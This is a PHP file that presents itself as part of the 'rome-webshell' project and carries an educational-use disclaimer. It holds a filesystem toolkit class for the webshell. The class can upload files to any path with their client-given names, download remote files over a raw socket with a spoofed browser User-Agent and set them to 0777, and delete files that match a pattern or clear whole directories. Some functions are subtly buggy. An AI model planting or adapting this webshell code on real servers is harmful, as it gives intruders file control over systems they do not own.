<!-- 
    @author Caesarovich
    @repository https://github.com/Caesarovich/rome-webshell

    This code is for educationnal purposes only.
    Malicious usage of this code will not hold the author responsible.
    Do not pentest without explicit permissions.

-->





<?php
class Tools_Filesystem {
	const fs_phpmod = 0777;
	const fs_append = 'a';
	const fs_rewrite = 'w';
	const eol = "\n";

	public static function array2csv(array &$array,$noheader=0,$delimiter=',')
	{
   if (count($array) == 0) {
     return null;
   }
   ob_start();
   $df = fopen("php://output", 'w');
   if(!$noheader) fputcsv($df, array_keys(reset($array)),$delimiter);

   foreach ($array as $row) {
      fputcsv($df, $row,$delimiter);
   }
   fclose($df);
	   return ob_get_clean();
	}
	
	public static function writeFile ($file, $data, $mode='') {
		$mode = $mode ? $mode : (file_exists ($file) ? self::fs_append : self::fs_rewrite);
		$fp = fopen ($file, $mode.'+');
		if ($fp) {
			fputs ($fp,$data);
			fclose ($fp);
			//@chmod($file,self::fs_phpmod);
			return true;
		} else return false;
	}
	
	public static function copyDirectory ($source,$target) {
		if (is_dir ($source)) {
			@mkdir  ($target);
			$d = dir ($source);
			while (false !== ($entry=$d->read())) {
				if ($entry == '.' || $entry == '..' ) {
					continue;
				}
				$Entry = $source . '/' . $entry;           
				if (is_dir ($Entry)) {
					self::copyDirectory ($Entry,$target.'/'.$entry);
					continue;
				}
				copy ($Entry,$target.'/'.$entry);
			}
			$d->close();
		} else {
			copy ($source,$target);
		}
	}
		
	public static function readFileContents ($file) {
		if (file_exists ($file)) {
			return file_get_contents ($file);
		} else return false;
	}
	
	public static function clearDirectory($path) {
		if($dir_handle = opendir($path)) {
			while($file = readdir($dir_handle))     {
				if($file == "." || $file == "..") {
					if(!@unlink($path."/".$file)) {
						   continue;
					}
				} else {
					@unlink($path."/".$file);
				}
			}
			closedir($dir_handle);
			return true;
		} else
			return false;
	}
	
	public static function removeDirectory($path) {
		if (self::clearDirectory($path))
			if(rmdir($path))
				   return true;
			else
			   return false;
		else
			return false;
	}
	
	public static function uploadFile ($var, $location, $filename = NULL) {
		$tempname = $_FILES[$var]['tmp_name'];
		if(isset($filename)) {
			$uploadpath = $location.$filename;
		} else {
			$uploadpath = $location.$_FILES[$var]['name'];
		}
		
		$result = false;
		
		if (is_uploaded_file($_FILES[$var]['tmp_name'])) {
			while (move_uploaded_file($tempname, $uploadpath)) { $result = true; }
		} else {
			return false;
		}
		return $result;
	}
	
	public static function searchAndDestroy ($dir, $pattern){
		if (is_dir($dir)) {
			$dh=opendir($dir);
			while ($file = readdir($dh)) {
				if (strpos ($file,$pattern)) {
					unlink ($dir.$file);
				}
			}
			return true;
		} else {
			return false;
		}
	}
	
	public static function removeFileExtension ($filename) {
		return str_replace ('.'.self::getFileExtension($filename),'',$filename);
	}
	
	public static function getFileExtension ($filename) {
		$ext = explode(".", $filename);
		return strtolower(array_pop($ext));
	}
	
	public static function byteSize($bytes) {
		$size = $bytes / 1024;
		if($size < 1024){
			$size = number_format($size, 2);
			$size .= ' KB';
		} else {
			if($size / 1024 < 1024){
				$size = number_format($size / 1024, 2);
				$size .= ' MB';
			} else if ($size / 1024 / 1024 < 1024){
				$size = number_format($size / 1024 / 1024, 2);
				$size .= ' GB';
			} 
		}
		return $size;
	}
	
	public static function downloadFile ($remoteFile, $localFile, $overwrite=true) {
		$cacheTime = 24;
		$connTimeout = 10;
		
		if (file_exists($localFile) && (time() - ($cacheTime * 3600) < filemtime($localFile)) && !$overwrite) {
			return true;
		} else {
			$url = parse_url($remoteFile);
			$host = $url['host'];
			$path = isset($url['path']) ? $url['path'] : '/';
		
			if (isset($url['query'])) {
				$path .= '?' . $url['query'];
			}
		
			$port = isset($url['port']) ? $url['port'] : '80';
			$fp = @fsockopen($host, '80', $errno, $errstr, $connTimeout );
		
			if(!$fp){
				if(file_exists($localFile)){
					return true;
				} else return false;
			} else {
				$header = "GET $path HTTP/1.0\r\n";
				$header .= "Host: $host\r\n";
				$header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6\r\n";
				$header .= "Accept: */*\r\n";
				$header .= "Accept-Language: en-us,en;q=0.5\r\n";
				$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
				$header .= "Keep-Alive: 300\r\n";
				$header .= "Connection: keep-alive\r\n";
				$header .= "Referer: http://$host\r\n\r\n";
		
				$response = '';
				fputs($fp, $header);
				
				while($line = fread($fp, 4096)){
					$response .= $line;
				}
				
				fclose( $fp );
				$pos = strpos($response, "\r\n\r\n");
				$response = substr($response, $pos + 4);
		
				if(!file_exists($localFile)){
					fopen($localFile, 'w');
				}
				
				if(is_writable($localFile)) {
					if($fp = fopen($localFile, 'w')){
						fwrite($fp, $response);
						fclose($fp);
						chmod ($localFile, 0777);
					}
				}
			}
		} 
	}
}
